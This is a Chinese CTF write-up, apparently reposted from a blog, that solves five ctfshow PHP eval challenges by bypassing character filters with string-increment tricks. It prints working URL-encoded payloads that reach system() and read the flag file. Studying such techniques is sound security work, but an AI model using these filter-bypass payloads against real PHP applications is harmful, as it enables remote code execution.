本周ctfshow的挑战注重点为RCE,主要利用是:自增绕过RCE
RCE挑战1
属于简单类型
源码
error_reporting(0);highlight_file(__FILE__);$code = $_POST['code'];$code = str_replace("(","括号",$code);$code = str_replace(".","点",$code);eval($code);发现过滤了(和.,我们可以利用反引号执行命令 echo输出
code=echo `ls /`;![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sxlrpVYo-1668950575883)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118145758514.png)]](https://file.lsjlt.com/upload/f/202309/09/drb1pkxmpq2.png)
输出flag
code=echo `cat /f1agaaa`;![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6qVbdFFU-1668950575884)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118145815342.png)]](https://file.lsjlt.com/upload/f/202309/09/g5pmvudhg01.png)
RCE挑战2
比较简单的
打开题目 审计源码
error_reporting(0);highlight_file(__FILE__);if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (is_string($ctfshow)) { if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ eval($ctfshow); }else{ echo("Are you hacking me AGAIN?"); } }else{ phpinfo(); }}我们跑一下 看看哪些字符没有被过滤
for ($i=32;$i<127;$i++){ if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){ echo chr($i)." "; }}结果:
! $ ' ( ) + , . / ; = [ ] _ 可以考虑$_绕过!(自增绕过)
编写
$_=[]._;$__=$_['!'=='='];$__++;$__++;$__++;$___=++$__;++$__;$___=++$__.$___;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;++$__;$___=$___.++$__;$_='_'.$___;($$_[_])($$_[__]);//相当于 ($_GET[_])($_GET[__]) 使用的时候url编码一下传入
?_=system&__=ls![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZTt2a0Ps-1668950575885)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118161938354.png)]](https://file.lsjlt.com/upload/f/202309/09/kdxxyvd0fvf.png)
找flag
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VisaQcTH-1668950575885)(F:/%E7%AC%94%E8%AE%B0%E5%9B%BE%E7%89%87/image-20221118162003296.png)]](https://file.lsjlt.com/upload/f/202309/09/xucrbw2unrl.png)
POST:ctf_show=%24_%3D%5B%5D._%3B%24__%3D%24_%5B'!'%3D%3D'%3D'%5D%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___%3D%2B%2B%24__%3B%2B%2B%24__%3B%24___%3D%2B%2B%24__.%24___%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___%3D%24___.%2B%2B%24__%3B%24_%3D'_'.%24___%3B(%24%24_%5B_%5D)(%24%24_%5B__%5D)%3BGET:?_=system&__=cat /f*RCE挑战3
限制字符的自增 对于我来说较难
源码
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。error_reporting(0);highlight_file(__FILE__);if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (is_string($ctfshow) && strlen($ctfshow) <= 105) { if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ eval($ctfshow); }else{ echo("Are you hacking me AGAIN?"); } }else{ phpinfo(); }}fuzz测试什么没有被过滤
for ($i=32;$i<127;$i++){ if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){ echo chr($i); }}输出
$()+,./01;=[]_要保证构造payload长度小于105而且还是自增rce
使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST _/_ == NAN
构造的payload
$_=(_/_._)[0];$_0=++$_;$_0=++$_.$_0;++$_;++$_;$_0.=++$_;$_0.=++$_;$_=_.$_0;($$_[0])($$_[1]);传入参数
POST:ctf_show=%24_%3D(_%2F_._)%5B0%5D%3B%24_0%3D%2B%2B%24_%3B%24_0%3D%2B%2B%24_.%24_0%3B%2B%2B%24_%3B%2B%2B%24_%3B%24_0.%3D%2B%2B%24_%3B%24_0.%3D%2B%2B%24_%3B%24_%3D_.%24_0%3B(%24%24_%5B0%5D)(%24%24_%5B1%5D)%3B&0=system&1=cat /f1agaaaRCE挑战4
源码
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。error_reporting(0);highlight_file(__FILE__);if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (is_string($ctfshow) && strlen($ctfshow) <= 84) { if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ eval($ctfshow); }else{ echo("Are you hacking me AGAIN?"); } }else{ phpinfo(); }}要求字符小于等于84
fuzz测试,可用字符
$()+,./0;=[]_ $()+,./;=[]_构造
$_=(_/_._)[0];++$_;$__=$_.$_++;++$_;++$_;++$_;$__.=$_++.$_;$_=_.$__;$$_[_]($$_[0]);// 分析一下//1.(_/_._)[0]==N//$__=$_.$_++; 此时的$_=O $_.$_++; 这个顺序是(实验得出来的):// 先使用 后自增 最后使用 $__=$_.O; -> $_++ -> $__=P.O;payload
ctf_show=%24_%3D(_%2F_._)%5B0%5D%3B%2B%2B%24_%3B%24__%3D%24_.%24_%2B%2B%3B%2B%2B%24_%3B%2B%2B%24_%3B%2B%2B%24_%3B%24__.%3D%24_%2B%2B.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D(%24%24_%5B0%5D)%3B&_=system&0=nl /f1agaaaRCE挑战5
源码
highlight_file(__FILE__);if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf_show']; if (is_string($ctfshow) && strlen($ctfshow) <= 73) { if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){ eval($ctfshow); }else{ echo("Are you hacking me AGAIN?"); } }else{ phpinfo(); }}限制传入的参数长度小于等于73
fuzz测试哪些字符没有被过滤
for ($i=32;$i<127;$i++){ if (!preg_match("/[a-zA-Z0-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",chr($i))){ echo chr($i); }}// $()+,./;=[]_构造payload
# 第一种 !!知识点!! 直接使用_POST当做参数$_=(_/_._)[_];$_++;$__=$_.$_++;++$_;++$_;$$_[$_=_.$__.++$_.++$_]($$_[_]);第一个参数:_POST 第二个参数:_ # 借助ctfshow群里佬的payload tql# 第二种# 不可见字符替换 !!知识点!!$_=(_/_._)[_];++$_;$a=$_.$_++;++$_;++$_;$_=_.$a.++$_.++$_;$$_[_]($$_[a]);# 转为url后将a改为 %ff $fe 等不可见字符ctf_show=$%ff=_(%ff/%ff)[%ff];$_=%2b%2b$%ff;$_=_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.=%2b%2b$%ff.%2b%2b$%ff;$$_[_]($$_[%ff]);&_=system&%ff=cat /f1agaaa另外更有大佬的payload
phpinfo安装了一个扩展gettext,该扩展支持函数_() ,相当于gettext(),直接转化为字符串
$a=_(a/a)[a];//相当于gettext(0/0)[0],得到N$_=++$a;//O$_=_.++$a.$_;//_PO$a++;$a++;//R$_.=++$a.++$a;//_POST$$_[a]($$_[_]);//$_POST[a]($_POST[_])来源地址:https://blog.csdn.net/bossDDYY/article/details/127954538
